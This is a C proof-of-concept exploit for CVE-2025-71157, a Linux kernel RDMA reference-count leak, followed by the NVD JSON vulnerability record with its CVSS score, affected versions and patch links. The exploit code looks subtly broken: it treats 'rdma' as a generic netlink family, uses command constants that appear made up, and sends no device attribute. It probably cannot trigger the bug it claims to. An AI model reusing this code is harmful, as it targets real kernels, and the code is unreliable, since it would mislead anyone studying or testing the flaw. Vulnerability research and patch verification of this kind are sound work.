CVE-2025-71157

/* * CVE-2025-71157 PoC - Linux Kernel RDMA Reference Count Leak * This PoC demonstrates triggering the reference count leak in ib_del_sub_device_and_put() * Compile: gcc -o cve_2025_71157_poc cve_2025_71157_poc.c -lnl-3 -lnl-genl-3 * Note: Requires CAP_NET_ADMIN or root privileges */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netlink/netlink.h> #include <netlink/genl/genl.h> #include <netlink/genl/ctrl.h> #define RDMA_NL_LS 4 /* RDMA netlink subsystem */ #define RDMA_NL_LS_CMD_DEL_DEV 5 /* Delete device command */ int main(int argc, char *argv[]) { struct nl_sock *sk; int family_id; int ret; printf("[*] CVE-2025-71157 PoC - RDMA Reference Count Leak\n"); printf("[*] Target: Linux Kernel RDMA/core ib_del_sub_device_and_put()\n\n"); /* Initialize netlink socket */ sk = nl_socket_alloc(); if (!sk) { fprintf(stderr, "[-] Failed to allocate netlink socket\n"); return -1; } /* Connect to generic netlink */ ret = genl_connect(sk); if (ret < 0) { fprintf(stderr, "[-] Failed to connect to generic netlink\n"); nl_socket_free(sk); return -1; } /* Get RDMA netlink family ID */ family_id = genl_ctrl_resolve(sk, "rdma"); if (family_id < 0) { fprintf(stderr, "[-] Failed to resolve RDMA netlink family\n"); nl_socket_free(sk); return -1; } printf("[+] Found RDMA netlink family (ID: %d)\n", family_id); /* * Trigger the vulnerability by sending DEL_DEV netlink message * This will cause ib_del_sub_device_and_put() to be called * with an existing device reference that won't be properly released */ struct nl_msg *msg; msg = nlmsg_alloc(); if (!msg) { fprintf(stderr, "[-] Failed to allocate netlink message\n"); nl_socket_free(sk); return -1; } /* Build netlink message for RDMA_NL_LS_CMD_DEL_DEV */ genlmsg_put(msg, NL_AUTO_PORT, NL_AUTO_SEQ, family_id, 0, 0, RDMA_NL_LS_CMD_DEL_DEV, 1); printf("[*] Sending RDMA DEL_DEV netlink message...\n"); /* Send the message */ ret = nl_send_auto(sk, msg); if (ret < 0) { fprintf(stderr, "[-] Failed to send netlink message\n"); nlmsg_free(msg); nl_socket_free(sk); return -1; } printf("[+] Message sent successfully\n"); printf("[*] The vulnerable code path will be triggered\n"); printf("[*] Check dmesg for reference count leak warnings\n"); /* Receive response */ ret = nl_recvmsgs_default(sk); if (ret < 0) { printf("[i] No response or error in receiving (code: %d)\n", ret); } nlmsg_free(msg); nl_socket_free(sk); printf("[*] Cleanup completed\n"); return 0; }

{"cve": {"id": "CVE-2025-71157", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T15:16:06.690", "lastModified": "2026-02-26T20:22:12.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: always drop device refcount in ib_del_sub_device_and_put()\n\nSince nldev_deldev() (introduced by commit 060c642b2ab8 (\"RDMA/nldev: Add\nsupport to add/delete a sub IB device through netlink\") grabs a reference\nusing ib_device_get_by_index() before calling ib_del_sub_device_and_put(),\nwe need to drop that reference before returning -EOPNOTSUPP error."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nRDMA/core: siempre liberar el contador de referencias del dispositivo en ib_del_sub_device_and_put()\n\nDado que nldev_deldev() (introducido por el commit 060c642b2ab8 ('RDMA/nldev: Añadir soporte para añadir/eliminar un subdispositivo IB a través de netlink') obtiene una referencia usando ib_device_get_by_index() antes de llamar a ib_del_sub_device_and_put(), necesitamos liberar esa referencia antes de devolver el error -EOPNOTSUPP."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.11", "versionEndExcluding": "6.12.64", "matchCriteriaId": "E1A69DF1-7D2D-4958-AF47-35C1F39A3BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.4", "matchCriteriaId": "DC988EA0-0E32-457A-BF95-89BEB31A227B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/20436f2742a92b7afeb2504eb559a98d2196b001", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fa3c411d21ebc26ffd175c7256c37cefa35020aa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fe8d456080423b9ed410469fbd1e2098d3acce2b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}